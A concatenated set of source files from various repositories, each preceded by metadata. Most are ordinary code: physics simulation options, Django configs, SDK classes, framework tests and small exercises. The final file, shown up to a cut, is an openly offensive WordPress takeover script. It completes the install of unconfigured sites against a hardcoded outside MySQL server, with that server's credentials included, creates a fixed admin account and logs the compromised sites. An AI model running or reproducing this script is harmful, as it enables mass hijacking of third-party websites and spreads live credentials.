8924bebb935b96d438ce85b384cfc132d9af90f6
|
refs/heads/master
| 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 762 |
py
|
# file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/31503010.py generated: Wed, 25 Jan 2017 15:25:30
#
# Event Type: 31503010
#
# ASCII decay Descriptor: [tau- -> pi- pi+ pi- nu_tau]cc
#
from Configurables import Generation
# Gauss generation options for event type 31503010 (tau- -> pi- pi+ pi- nu_tau).
Generation().EventType = 31503010
Generation().SampleGenerationTool = "SignalPlain"
from Configurables import SignalPlain
Generation().addTool( SignalPlain )
Generation().SignalPlain.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
# Decay model and acceptance cut come from the DecFiles decay descriptor.
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/tau_pi-pi+pi-nu=DecProdCut.dec"
Generation().SignalPlain.CutTool = "DaughtersInLHCb"
# Signal PDG IDs: tau- (15) and tau+ (-15).
Generation().SignalPlain.SignalPIDList = [ 15,-15 ]
|
[
"[email protected]"
] | |
464fd32e21826eb900ab44421bba05a56e8c869a
|
6935f8334f17e59f0691695e1404ce2fa3c18b98
|
/src/signali_notification/migrations/0001_initial.py
|
f541895c83cd237322504219131944b4e337173d
|
[] |
no_license
|
obshtestvo/signali
|
a7b74746cba487ea3dacedbd2eda4876b972056e
|
f0c64bea9e151023612e33e476d0723819924e19
|
refs/heads/master
| 2016-08-05T17:13:55.793165 | 2016-01-20T16:39:36 | 2016-01-20T16:39:36 | 34,040,168 | 0 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,159 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
class Migration(migrations.Migration):
    # Initial migration: creates the Subscriber model, which links an e-mail
    # address to a ContactPoint and tracks when it was last notified.

    dependencies = [
        ('signali_contact', '0004_auto_20150903_0029'),
    ]
    operations = [
        migrations.CreateModel(
            name='Subscriber',
            fields=[
                ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),
                ('email', models.EmailField(max_length=250, verbose_name='email')),
                ('last_notified_at', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Last notified at')),
                ('created_at', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Added at')),
                ('contactpoint', models.ForeignKey(related_name='subscribers', to='signali_contact.ContactPoint')),
            ],
            options={
                'abstract': False,
                'verbose_name_plural': 'subscriber',
                'verbose_name': 'subscriber',
            },
            bases=(models.Model,),
        ),
    ]
[
"[email protected]"
] | |
170ccd24c50321c37c6335c0652314406ed7802a
|
22a7161361089b84a09457b46d79ce2bd87f5b2c
|
/tests/urls.py
|
bb83d09b1ab5c7ac9d1103f51acf97588d336b6b
|
[] |
no_license
|
matthew-a-dunlap/django-inspectional-registration
|
56fb9b9945d41de069034fd066e3b92b388b8498
|
d6dd945718e5f7ac09966763c83104c4966cb775
|
refs/heads/master
| 2020-09-09T17:33:18.128626 | 2016-05-23T19:57:19 | 2016-05-23T19:57:19 | 221,512,520 | 0 | 0 | null | 2019-11-13T17:13:08 | 2019-11-13T17:13:07 | null |
UTF-8
|
Python
| false | false | 399 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
# Fall back to the pre-Django-1.4 import location for old versions.
try:
    from django.conf.urls import url, patterns, include
except ImportError:
    from django.conf.urls.defaults import url, patterns, include
from django.contrib import admin
admin.autodiscover()
# Minimal URLconf used only by the test suite.
urlpatterns = patterns('',
    url(r'^admin/', include(admin.site.urls)),
    url(r'^registration/', include('registration.urls')),
)
|
[
"[email protected]"
] | |
4c19d1c4ca2143d49702c83bd6fe7486af618b32
|
6df4a4cbdaf59009838b2c70b518e66633c67de0
|
/user_portrait/cron/recommentation_in/filter_rules.py
|
c4a58b227bbab39a9fd134e2bd2cc7cfcf24955f
|
[] |
no_license
|
jianjian0dandan/user_portrait
|
ccf5f43f0aca2d40581faae215fdda1db997a354
|
3114ca2fcec23a7039887cca953793ef34cb7f72
|
refs/heads/master
| 2021-01-15T19:59:16.286276 | 2016-05-18T03:30:37 | 2016-05-18T03:30:37 | 42,869,391 | 0 | 0 | null | 2015-09-21T13:56:51 | 2015-09-21T13:56:51 | null |
UTF-8
|
Python
| false | false | 4,731 |
py
|
# -*- coding: UTF-8 -*-
import sys
import csv
import json
import time
reload(sys)
sys.path.append('../../')
from global_utils import R_CLUSTER_FLOW2 as r_cluster
from global_utils import R_DICT, es_retweet, retweet_index_name_pre, retweet_index_type
from time_utils import datetime2ts, ts2datetime
from parameter import DAY
from parameter import RUN_TYPE, RUN_TEST_TIME
from parameter import RECOMMEND_IN_ACTIVITY_THRESHOLD as activity_threshold
from parameter import RECOMMEND_IN_IP_THRESHOLD as ip_threshold
from parameter import RECOMMEND_IN_RETWEET_THRESHOLD as retweet_threshold
from parameter import RECOMMEND_IN_MENTION_THRESHOLD as mention_threshold
from cron.detect.cron_detect import get_db_num
# Module-level CSV log of filtered-out users and the rule that removed them.
# NOTE(review): hard-coded absolute path and the file handle is never closed;
# consider a relative path + context manager.
csvfile = open('/home/ubuntu8/huxiaoqian/user_portrait/user_portrait/cron/recommentation_in/filter_uid_list.csv', 'wb')
writer = csv.writer(csvfile)
def filter_activity(user_set):
    """Keep users whose per-slot weibo counts never exceed the activity
    threshold in any of the last 7 days; filtered users are logged to CSV.
    """
    results = []
    # run_type: live runs anchor on today, test runs on a fixed date
    if RUN_TYPE == 1:
        now_date = ts2datetime(time.time())
    else:
        now_date = RUN_TEST_TIME
    anchor_ts = datetime2ts(now_date) - DAY
    # normalize to the start of the previous day
    timestamp = datetime2ts(ts2datetime(anchor_ts))
    for user in user_set:
        over_count = 0
        for day_offset in range(0, 7):
            day_ts = timestamp - DAY * day_offset
            payload = r_cluster.hget('activity_' + str(day_ts), str(user))
            if payload:
                items_dict = json.loads(payload)
                for item in items_dict:
                    if items_dict[item] > activity_threshold:
                        over_count += 1
        if over_count == 0:
            results.append(user)
        else:
            writer.writerow([user, 'activity'])
    return results
def filter_ip(user_set):
    """Keep users whose distinct login-IP count over the last 7 days is
    below ip_threshold.

    Filtered-out users are logged to the CSV `writer` with reason 'ip'.

    Parameters:
        user_set: iterable of uids to screen.
    Returns:
        list of uids that pass the IP filter.
    """
    results = []
    # run_type: live clock in production, pinned date under test
    if RUN_TYPE == 1:
        now_date = ts2datetime(time.time())
    else:
        now_date = RUN_TEST_TIME
    ts = datetime2ts(now_date) - DAY
    for user in user_set:
        ip_set = set()
        for i in range(0, 7):
            timestamp = ts - DAY * i
            # BUG FIX: the per-day hash key must use `timestamp`; the original
            # used the loop-invariant `ts`, so the same day's data was read
            # seven times and the 7-day window was never actually scanned.
            ip_result = r_cluster.hget('ip_' + str(timestamp), str(user))
            if ip_result:
                result_dict = json.loads(ip_result)
            else:
                result_dict = {}
            for ip in result_dict:
                ip_set.add(ip)
        if len(ip_set) < ip_threshold:
            results.append(user)
        else:
            writer.writerow([user, 'ip'])
    return results
def filter_retweet_count(user_set):
    """Keep users who retweeted fewer than retweet_threshold distinct users.

    Looks users up in the retweet Elasticsearch index in batches of
    FILTER_ITER_COUNT. Users with no retweet document at all pass the
    filter; filtered-out users are logged to the CSV `writer` as 'retweet'.
    """
    FILTER_ITER_COUNT = 100;  # ES mget batch size
    results = []
    now_ts = time.time()
    # Select the retweet index shard for the current time window.
    db_number = get_db_num(now_ts)
    retweet_index_name = retweet_index_name_pre + str(db_number)
    # test
    search_user_count = len(user_set);
    iter_search_count = 0
    while iter_search_count < search_user_count:
        iter_search_user_list = user_set[iter_search_count:iter_search_count + FILTER_ITER_COUNT]
        try:
            retweet_result = es_retweet.mget(index = retweet_index_name, doc_type = retweet_index_type,\
                    body = {'ids':iter_search_user_list}, _source=True)['docs']
        except:
            # NOTE(review): bare except treats any ES failure as "no documents",
            # which silently drops the whole batch from `results`.
            retweet_result = []
        for retweet_item in retweet_result:
            if retweet_item['found']:
                retweet_set = set()
                user = retweet_item['_id']
                # uid_retweet is a JSON object keyed by retweeted uid; only the
                # number of distinct uids matters here, not the counts.
                per_retweet_result = json.loads(retweet_item['_source']['uid_retweet'])
                for retweet_user in per_retweet_result:
                    retweet_set.add(retweet_user)
                if len(retweet_set) < retweet_threshold:
                    results.append(user)
                else:
                    writer.writerow([user, 'retweet'])
            else:
                # No retweet record at all -> passes the filter.
                user = retweet_item['_id']
                results.append(user)
        iter_search_count += FILTER_ITER_COUNT
    return results
def filter_mention(user_set):
    """Keep users who @-mentioned fewer than mention_threshold distinct
    users over the last 7 days; others are logged to `writer` as 'mention'."""
    kept = []
    # run_type: live clock in production, pinned date under test
    now_date = ts2datetime(time.time()) if RUN_TYPE == 1 else RUN_TEST_TIME
    base_ts = datetime2ts(now_date) - DAY
    for user in user_set:
        mentioned = set()
        for day in range(7):
            raw = r_cluster.hget('at_' + str(base_ts - DAY * day), str(user))
            if raw:
                mentioned.update(json.loads(raw))
        if len(mentioned) < mention_threshold:
            kept.append(user)
        else:
            writer.writerow([user, 'mention'])
    return kept
|
[
"[email protected]"
] | |
1e44f68b4293ce9210579097294860acfc7ebac2
|
f8f2536fa873afa43dafe0217faa9134e57c8a1e
|
/aliyun-python-sdk-ons/aliyunsdkons/request/v20190214/UntagResourcesRequest.py
|
3e59f17cdafd0c517f61e6e5a9daaacecfc58d26
|
[
"Apache-2.0"
] |
permissive
|
Sunnywillow/aliyun-openapi-python-sdk
|
40b1b17ca39467e9f8405cb2ca08a85b9befd533
|
6855864a1d46f818d73f5870da0efec2b820baf5
|
refs/heads/master
| 2022-12-04T02:22:27.550198 | 2020-08-20T04:11:34 | 2020-08-20T04:11:34 | 288,944,896 | 1 | 0 |
NOASSERTION
| 2020-08-20T08:04:01 | 2020-08-20T08:04:01 | null |
UTF-8
|
Python
| false | false | 2,302 |
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkons.endpoint import endpoint_data
class UntagResourcesRequest(RpcRequest):
    """RPC request wrapper for the Ons (RocketMQ) UntagResources API
    (version 2019-02-14).

    Generated-SDK style: each get_/set_ pair maps one query parameter;
    list-valued parameters are flattened to `Name.1`, `Name.2`, ...
    """
    def __init__(self):
        RpcRequest.__init__(self, 'Ons', '2019-02-14', 'UntagResources','ons')
        self.set_method('POST')
        # Wire up per-region endpoint resolution when endpoint data is present.
        if hasattr(self, "endpoint_map"):
            setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
        if hasattr(self, "endpoint_regional"):
            setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())

    def get_All(self):
        return self.get_query_params().get('All')

    def set_All(self,All):
        self.add_query_param('All',All)

    def get_ResourceIds(self):
        return self.get_query_params().get('ResourceIds')

    def set_ResourceIds(self, ResourceIds):
        # Flatten the list into ResourceId.1, ResourceId.2, ... (1-based).
        for depth1 in range(len(ResourceIds)):
            if ResourceIds[depth1] is not None:
                self.add_query_param('ResourceId.' + str(depth1 + 1) , ResourceIds[depth1])

    def get_ResourceType(self):
        return self.get_query_params().get('ResourceType')

    def set_ResourceType(self,ResourceType):
        self.add_query_param('ResourceType',ResourceType)

    def get_InstanceId(self):
        return self.get_query_params().get('InstanceId')

    def set_InstanceId(self,InstanceId):
        self.add_query_param('InstanceId',InstanceId)

    def get_TagKeys(self):
        return self.get_query_params().get('TagKeys')

    def set_TagKeys(self, TagKeys):
        # Flatten the list into TagKey.1, TagKey.2, ... (1-based).
        for depth1 in range(len(TagKeys)):
            if TagKeys[depth1] is not None:
                self.add_query_param('TagKey.' + str(depth1 + 1) , TagKeys[depth1])
|
[
"[email protected]"
] | |
45620672ed607a3171dae6cf19a63dea278a32ce
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/_algorithms_challenges/edabit/_Edabit-Solutions-master/Odd Up, Even Down/solution.py
|
280dd4e50c5e27743667091935a4280519266904
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 149 |
py
|
def transform(lst):
    """Odd Up, Even Down: return a new list where every even number is
    decremented by 1 and every odd number is incremented by 1.

    The original block was an unfilled exercise template (placeholder
    tokens such as `___` and `?.a..`) and was not valid Python; this is
    the reconstructed solution it encodes.
    """
    return [i - 1 if i % 2 == 0 else i + 1 for i in lst]
|
[
"[email protected]"
] | |
b74fd5349fcc910ed9dcad8717e15620b73eb4be
|
c516df2118000e3abaa61527de7badb94680081e
|
/utilities/common.py
|
b3a2eae746c77898ae21aed1623a0194a141bbd9
|
[
"MIT"
] |
permissive
|
xod442/paw
|
82c8d54af052edaea05ed36a0846fe9722f047f3
|
f55df04dd7af7a1b25844c809187a99cfb24b813
|
refs/heads/main
| 2023-04-16T12:19:50.849945 | 2021-04-26T20:06:51 | 2021-04-26T20:06:51 | 360,992,530 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,345 |
py
|
import time
import boto3
from flask import current_app
import datetime
import arrow
import bleach
def utc_now_ts():
    """Return the current Unix timestamp as a whole number of seconds."""
    now = time.time()
    return int(now)
def utc_now_ts_ms():
    # NOTE(review): this returns a zero-argument *callable* that produces the
    # current epoch milliseconds, not the value itself — callers must invoke
    # the result (utc_now_ts_ms()()). That is asymmetric with utc_now_ts()
    # and looks like a bug; confirm against call sites before changing.
    return lambda: int(round(time.time() * 1000))
def ms_stamp_humanize(ts):
    """Convert a millisecond epoch timestamp into a human-readable relative
    phrase (e.g. '2 hours ago') via arrow."""
    # Incoming ts is in milliseconds; fromtimestamp expects seconds.
    ts = datetime.datetime.fromtimestamp(ts/1000.0)
    return arrow.get(ts).humanize()
def linkify(text):
    """Strip every HTML tag/attribute/style from `text`, then auto-convert
    bare URLs in the remaining plain text into anchor tags."""
    text = bleach.clean(text, tags=[], attributes={}, styles=[], strip=True)
    return bleach.linkify(text)
def email(to_email, subject, body_html, body_text):
    """Send an email through AWS SES.

    Returns False (without sending) when running under tests or when the
    AWS_SEND_MAIL config flag is off; otherwise returns the boto3
    send_email response dict.
    """
    # don't run this if we're running a test or setting is False
    if current_app.config.get('TESTING') or not current_app.config.get('AWS_SEND_MAIL'):
        return False
    client = boto3.client('ses')
    # Sender address is hard-coded; both HTML and plain-text parts are sent.
    return client.send_email(
        Source='[email protected]',
        Destination={
            'ToAddresses': [
                to_email,
            ]
        },
        Message={
            'Subject': {
                'Data': subject,
                'Charset': 'UTF-8'
            },
            'Body': {
                'Text': {
                    'Data': body_text,
                    'Charset': 'UTF-8'
                },
                'Html': {
                    'Data': body_html,
                    'Charset': 'UTF-8'
                },
            }
        }
    )
|
[
"[email protected]"
] | |
1fe26b687dbd81149de336083512b6e7129e88d1
|
2eb779146daa0ba6b71344ecfeaeaec56200e890
|
/python/oneflow/compatible/single_client/test/ops/test_transpose.py
|
02117e32289d49fe2caa7a1e4f230115958caf6e
|
[
"Apache-2.0"
] |
permissive
|
hxfxjun/oneflow
|
ee226676cb86f3d36710c79cb66c2b049c46589b
|
2427c20f05543543026ac9a4020e479b9ec0aeb8
|
refs/heads/master
| 2023-08-17T19:30:59.791766 | 2021-10-09T06:58:33 | 2021-10-09T06:58:33 | 414,906,649 | 0 | 0 |
Apache-2.0
| 2021-10-09T06:15:30 | 2021-10-08T08:29:45 |
C++
|
UTF-8
|
Python
| false | false | 4,027 |
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import unittest
from collections import OrderedDict
import numpy as np
import tensorflow as tf
import test_global_storage
from test_util import GenArgList
import oneflow.compatible.single_client.unittest
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client import typing as tp
gpus = tf.config.experimental.list_physical_devices("GPU")
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
def compare_with_tensorflow(device_type, input_shape, perm):
    """Run a OneFlow transpose forward+backward pass and check both the
    output and the input gradient against TensorFlow's tf.transpose.

    Args:
        device_type: "gpu" or "cpu".
        input_shape: shape of the trainable input variable.
        perm: axis permutation passed to transpose.
    """
    assert device_type in ["gpu", "cpu"]
    flow.clear_default_session()
    func_config = flow.FunctionConfig()
    func_config.default_data_type(flow.float)

    @flow.global_function(type="train", function_config=func_config)
    def TransposeJob():
        with flow.scope.placement(device_type, "0:0"):
            x = flow.get_variable(
                "input",
                shape=input_shape,
                dtype=flow.float,
                initializer=flow.random_uniform_initializer(minval=2, maxval=5),
                trainable=True,
            )
            loss = flow.transpose(x, perm)
            flow.optimizer.SGD(
                flow.optimizer.PiecewiseConstantScheduler([], [0.0001]), momentum=0
            ).minimize(loss)
            # Capture input/output tensors and their gradients so they can be
            # compared against the TF reference after the job runs.
            flow.watch(x, test_global_storage.Setter("x"))
            flow.watch_diff(x, test_global_storage.Setter("x_diff"))
            flow.watch(loss, test_global_storage.Setter("loss"))
            flow.watch_diff(loss, test_global_storage.Setter("loss_diff"))
            return loss

    of_out = TransposeJob().get()
    # Reference computation: reuse OneFlow's captured input and upstream
    # gradient so both frameworks operate on identical data.
    with tf.GradientTape(persistent=True) as tape:
        x = tf.Variable(test_global_storage.Get("x"))
        tf_out = tf.transpose(x, perm)
    loss_diff = test_global_storage.Get("loss_diff")
    tf_x_diff = tape.gradient(tf_out, x, loss_diff)
    assert np.allclose(of_out.numpy(), tf_out.numpy(), rtol=1e-05, atol=1e-05)
    assert np.allclose(
        test_global_storage.Get("x_diff"), tf_x_diff.numpy(), rtol=1e-05, atol=1e-05
    )
@flow.unittest.skip_unless_1n1d()
class TestTranspose(flow.unittest.TestCase):
    """Parameterized transpose checks across device, input rank (2D-6D) and
    permutation, each delegated to compare_with_tensorflow."""

    def test_transpose(test_case):
        # 4-D inputs.
        arg_dict = OrderedDict()
        arg_dict["device_type"] = ["gpu", "cpu"]
        arg_dict["input_shape"] = [(10, 11, 12, 13)]
        arg_dict["perm"] = [(2, 0, 1, 3), (1, 0, 2, 3), (3, 2, 1, 0), (3, 1, 2, 0)]
        for arg in GenArgList(arg_dict):
            compare_with_tensorflow(*arg)

    def test_transpose2(test_case):
        # 3-D inputs.
        arg_dict = OrderedDict()
        arg_dict["device_type"] = ["gpu", "cpu"]
        arg_dict["input_shape"] = [(10, 11, 12)]
        arg_dict["perm"] = [(2, 0, 1), (1, 0, 2), (2, 1, 0), (1, 2, 0)]
        for arg in GenArgList(arg_dict):
            compare_with_tensorflow(*arg)

    def test_transpose3(test_case):
        # 2-D inputs, including the identity permutation.
        arg_dict = OrderedDict()
        arg_dict["device_type"] = ["gpu", "cpu"]
        arg_dict["input_shape"] = [(10, 11)]
        arg_dict["perm"] = [(1, 0), (0, 1)]
        for arg in GenArgList(arg_dict):
            compare_with_tensorflow(*arg)

    def test_transpose_dim6(test_case):
        # 6-D input exercises the high-rank code path.
        arg_dict = OrderedDict()
        arg_dict["device_type"] = ["gpu", "cpu"]
        arg_dict["input_shape"] = [(2, 3, 4, 5, 6, 7)]
        arg_dict["perm"] = [(2, 0, 1, 3, 5, 4)]
        for arg in GenArgList(arg_dict):
            compare_with_tensorflow(*arg)
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
60e077f3f23f697b0b33bdeca4b24594f3478247
|
626b14ce13986b6d5e03143e151004247659625a
|
/Day01-15/code/Day08/student.py
|
7d753978b63ee1f015b2f6a12f70198e93ff89bc
|
[] |
no_license
|
Focavn/Python-100-Days
|
c7586ecf7ae3f1fd42f024558bb998be23ee9df8
|
d8de6307aeff9fe31fd752bd7725b9cc3fbc084b
|
refs/heads/master
| 2021-08-08T17:57:02.025178 | 2020-09-17T11:58:04 | 2020-09-17T11:58:04 | 220,427,144 | 0 | 0 | null | 2019-11-08T08:59:43 | 2019-11-08T08:59:41 | null |
UTF-8
|
Python
| false | false | 1,108 |
py
|
"""
定义和使用学生类
Version: 0.1
Author: 骆昊
Date: 2018-03-08
"""
def _foo():
print('test')
class Student(object):
    """A student identified by a name and an age."""

    def __init__(self, name, age):
        """Bind the name and age attributes onto the new student."""
        self.name = name
        self.age = age

    def study(self, course_name):
        """Announce that this student is studying the given course."""
        print('%s正在学习%s.' % (self.name, course_name))

    def watch_av(self):
        """Announce what this student may watch, gated on being 18 or older."""
        if self.age >= 18:
            print('%s正在观看岛国大电影.' % self.name)
        else:
            print('%s只能观看《熊出没》.' % self.name)
def main():
    """Create two students and exercise study/watch behaviour for each."""
    roster = (
        ('骆昊', 38, 'Python程序设计'),
        ('王大锤', 15, '思想品德'),
    )
    for name, age, course in roster:
        student = Student(name, age)
        student.study(course)
        student.watch_av()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
96b72c3e8d75f73087aa5d785f9d688d43fba4a9
|
920b9cb23d3883dcc93b1682adfee83099fee826
|
/iam/meta.py
|
1c14641c524eaf4af143f55b16491ad41f993154
|
[
"MIT",
"LGPL-2.1-or-later",
"LGPL-3.0-only"
] |
permissive
|
TencentBlueKing/bk-itsm
|
f817fb166248d3059857b57d03e8b5ec1b78ff5b
|
2d708bd0d869d391456e0fb8d644af3b9f031acf
|
refs/heads/master
| 2023-08-31T23:42:32.275836 | 2023-08-22T08:17:54 | 2023-08-22T08:17:54 | 391,839,825 | 100 | 86 |
MIT
| 2023-09-14T08:24:54 | 2021-08-02T06:35:16 |
Python
|
UTF-8
|
Python
| false | false | 1,689 |
py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
_SYSTEM = "system"
_RESOURCES = "resources"
_ACTIONS = "actions"

# In-process registry: section -> system_id -> (nested ids ->) {"name": ...}
__meta_info__ = {_SYSTEM: {}, _RESOURCES: {}, _ACTIONS: {}}


def setup_system(system_id, system_name):
    """Register (or overwrite) the display name of a system."""
    entry = __meta_info__[_SYSTEM].setdefault(system_id, {})
    entry["name"] = system_name


def get_system_name(system_id):
    """Return a system's display name, or None if it was never registered."""
    entry = __meta_info__[_SYSTEM].get(system_id, {})
    return entry.get("name")


def setup_resource(system_id, resource_id, resource_name):
    """Register (or overwrite) the display name of a resource in a system."""
    system_entry = __meta_info__[_RESOURCES].setdefault(system_id, {})
    system_entry.setdefault(resource_id, {})["name"] = resource_name


def get_resource_name(system_id, resource_id):
    """Return a resource's display name, or None if unregistered."""
    system_entry = __meta_info__[_RESOURCES].get(system_id, {})
    return system_entry.get(resource_id, {}).get("name")


def setup_action(system_id, action_id, action_name):
    """Register (or overwrite) the display name of an action in a system."""
    system_entry = __meta_info__[_ACTIONS].setdefault(system_id, {})
    system_entry.setdefault(action_id, {})["name"] = action_name


def get_action_name(system_id, action_id):
    """Return an action's display name, or None if unregistered."""
    system_entry = __meta_info__[_ACTIONS].get(system_id, {})
    return system_entry.get(action_id, {}).get("name")
|
[
"[email protected]"
] | |
20a9aad0196588ee85844a524186b9c74f485d9b
|
63862669b6b428ef23e2733e50b47ef7a11ceb60
|
/basic info/varia.py
|
ce978e8d87db873269e2593e3bcd2404f720095d
|
[] |
no_license
|
CyborgVillager/Learning_py_info
|
961fde2cdba7ec0b7e1aacd437aeba99083cd192
|
a1504ab4610f88ae2de738a49ac6513c3358a177
|
refs/heads/master
| 2020-11-25T22:17:33.966387 | 2020-02-11T04:34:29 | 2020-02-11T04:34:29 | 228,869,781 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 620 |
py
|
#variables
def story_example():
    """Print a short two-paragraph demo story built from local variables."""
    name = "John"
    age = 25
    para0 = ("Lorem ipsum dolor sit amet, consectetur adipiscing elit. In interdum, odio et feugiat auctor, ante leo t"
             "incidunt tortor, sed lacinia leo augue vel lorem. In rutrum est libero")
    para1 = ("Nunc euismod magna in diam finibus sollicitudin. Aliquam commodo tortor lorem, in tincidunt quam dapibus "
             "fringilla. Duis vitae sem ut ligula efficitur varius.")
    print(name, 'is age', str(age), para0, '\n', name, para1)


def story_start():
    """Entry point: delegate to story_example()."""
    story_example()


story_start()
|
[
"[email protected]"
] | |
249c8be8faca60c67ed1827c6122bee07e1fa8ac
|
a5a4cee972e487512275c34f308251e6cc38c2fa
|
/tests_old/tests_openmpi/test_hello_world/test_hello_world.py
|
b5a6b03915a4a452b63bb6efdf8838d172ecddf7
|
[
"MIT"
] |
permissive
|
eragasa/pypospack
|
4f54983b33dcd2dce5b602bc243ea8ef22fee86b
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
refs/heads/master
| 2021-06-16T09:24:11.633693 | 2019-12-06T16:54:02 | 2019-12-06T16:54:02 | 99,282,824 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 706 |
py
|
from subprocess import call
import os
# possibly the greatest hack of a test to ever be written
def test_hello_world():
    """Submit the MPI hello-world job via sbatch, then poll the filesystem.

    Passes once all four per-rank marker files exist (and removes them);
    fails once job.err appears (and removes job.err/job.out).
    NOTE(review): busy-waits forever if neither condition is ever met, and
    spins without sleeping between polls.
    """
    call(["sbatch", "runjob_hipergator.sh"])
    while True:
        r0 = os.path.exists("rank_0")
        r1 = os.path.exists("rank_1")
        r2 = os.path.exists("rank_2")
        r3 = os.path.exists("rank_3")
        err = os.path.exists("job.err")
        if all([r0, r1, r2, r3]):
            # Every MPI rank wrote its marker file -> job succeeded.
            os.remove("rank_0")
            os.remove("rank_1")
            os.remove("rank_2")
            os.remove("rank_3")
            assert True
            return
        if err:
            # Scheduler wrote an error log -> job failed.
            os.remove("job.err")
            os.remove("job.out")
            assert False
            return
|
[
"[email protected]"
] | |
e39ec3b82e0551f31532345f993df0e4da0ee93f
|
459185e0e12d486e91fcfff3e6d6174afbdf70db
|
/JEX-V4/Exploits/wpinstall.py
|
84eb5f88c61670e0b117e32045f691f557ac28bc
|
[] |
no_license
|
Hdiaktoros/laravel-dorks
|
e42a1be938b0fdbbf17e6689d50c7f8bcf30c464
|
a9ae0af4a27b522f939b5c1627db3b98f18bb5c3
|
refs/heads/main
| 2023-07-05T02:59:17.032717 | 2021-08-21T16:30:42 | 2021-08-21T16:30:42 | 398,522,099 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,456 |
py
|
# coding=utf-8
from Exploits import printModule
import requests
from random import sample
from BruteForce import Wordpress
# ----------------==---- MY USER AGent ----==----------------
Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0'}
# -------------------- MYSQl SERVER INFO --------------------
HOST = '31.210.78.238'
USER = 'francesco_res'
PASS = 'L30zDTZDTP'[::-1]
DB = 'francesco_reservex'
# ----------------==---- WpInstall Info ----==----------------
username = 'u1337'
password = 'uAdmin@123'
# ------------------------------------------------------------
def RandomGenerator(lenth):
    """Return `lenth` distinct random lowercase ASCII letters as one string."""
    alphabet = 'abcdefghijklmnopqrstuvwxyz'
    picked = sample(alphabet, lenth)
    return ''.join(picked)
def WpInstall(site, Email):
    """Attempt to complete a fresh WordPress install on `site` using the
    hard-coded external MySQL server, then verify and record the outcome.

    On success the credentials are appended to result/Wp-Installed.txt and a
    login attempt is made; otherwise the setup URL is logged for later.
    Returns a printModule status line either way.
    NOTE(review): offensive tooling — the bare excepts deliberately swallow
    all network errors so the scan keeps moving.
    """
    session = requests.Session()
    # Random table prefix avoids collisions when many targets share one DB.
    RandomStringForPREFIX = str('wp_' + str(RandomGenerator(8)) + '_')
    try:
        # setup-config step 2: point the target at the attacker-controlled DB.
        DATA = {
            'dbname': DB,
            'uname': USER,
            'pwd': PASS,
            'dbhost': HOST,
            'prefix': RandomStringForPREFIX,
            'language': 'en_US',
            'submit': 'Submit'
        }
        A = session.post('http://' + site + '/wp-admin/setup-config.php?step=2', data=DATA, headers=Headers, timeout=10)
        if 'install.php' in str(A.content):
            # Config accepted -> run install step 2 with the fixed admin creds.
            POSTDATA_Install = {
                'weblog_title': 'installed|jex',
                'user_name': username,
                'admin_password': password,
                'pass1-text': password,
                'admin_password2': password,
                'pw_weak': 'on',
                'admin_email': Email,
                'Submit': 'Install+WordPress',
